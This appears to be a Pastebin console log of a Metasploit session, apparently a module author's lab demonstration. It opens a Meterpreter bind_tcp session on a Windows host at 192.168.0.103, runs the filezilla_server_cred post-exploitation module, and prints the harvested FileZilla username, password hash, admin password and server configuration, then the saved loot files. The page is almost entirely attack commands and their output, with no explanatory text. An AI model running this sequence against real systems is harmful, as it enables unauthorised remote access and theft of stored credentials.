Advertisement
Guest User

Untitled

a guest
Aug 1st, 2017
82
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.68 KB | None | 0 0
  1. fahrenheit:msf3 bannedit$ ruby msfconsole
  2.  
  3. 888 888 d8b888
  4. 888 888 Y8P888
  5. 888 888 888
  6. 88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
  7. 888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888
  8. 888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888
  9. 888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
  10. 888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
  11. 888
  12. 888
  13. 888
  14.  
  15.  
  16. =[ metasploit v3.6.0-beta [core:3.6 api:1.0]
  17. -- --=[ 647 exploits - 340 auxiliary
  18. -- --=[ 216 payloads - 27 encoders - 8 nops
  19. =[ svn r11875 updated today (2011.03.04)
  20.  
  21. msf > use multi/handler
  22. msf exploit(handler) > set RHOST 192.168.0.103
  23. RHOST => 192.168.0.103
  24. msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
  25. PAYLOAD => windows/meterpreter/bind_tcp
  26. msf exploit(handler) > exploit -j
  27. [*] Exploit running as background job.
  28.  
  29. [*] Starting the payload handler...
  30. [*] Started bind handler
  31. [*] Sending stage (749056 bytes) to 192.168.0.103
  32. [*] Meterpreter session 1 opened (192.168.0.108:55066 -> 192.168.0.103:4444) at 2011-03-04 11:47:45 -0500
  33.  
  34. msf exploit(handler) > use post/windows/gather/filezilla_server_cred
  35. msf post(filezilla_server_cred) > set SESSION 1
  36. SESSION => 1
  37. msf post(filezilla_server_cred) > run
  38.  
  39. [*] Checking for Filezilla Server directory in: C:\Program Files\FileZilla Server\
  40. [*] Found FileZilla Server
  41.  
  42. [*] Collected the following credentials:
  43. [*] Username: bannedit
  44. [*] Password: ae2b1fca515949e5d54fb22b8ed95575
  45. [*] Group: users
  46.  
  47. [*] Collected the following configuration details:
  48. [*] FTP Port: 21
  49. [*] FTP Bind IP: 0.0.0.0
  50. [*] SSL: false
  51. [*] Admin Port: 14147
  52. [*] Admin Bind IP: 0.0.0.0
  53. [*] Admin Pass: ftpadmin
  54.  
  55. [*] Post module execution completed
  56. msf post(filezilla_server_cred) >
  57.  
  58.  
  59. fahrenheit:~ bannedit$ cat ~/.msf3/loot/*
  60. FTP Port,FTP Bind IP,Admin Port,Admin Bind IP,Admin Password,SSL,SSL Certfile,SSL Key Password
  61. "21","0.0.0.0","14147","0.0.0.0","ftpadmin","false","<none>","<none>"
  62. Host,User,Dir,FileRead,FileDelete,FileAppend,DirCreate,DirDelete,DirList,DirSubdirs,Home,AutoCreate
  63. "0.0.0.0","bannedit","C:\Documents and Settings\bannedit\My Documents","1","0","0","0","0","0","1","1","0"
  64. Host,Port,User,Password,SSL
  65. "0.0.0.0","21","bannedit","ae2b1fca515949e5d54fb22b8ed95575","false"
  66. fahrenheit:~ bannedit$
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement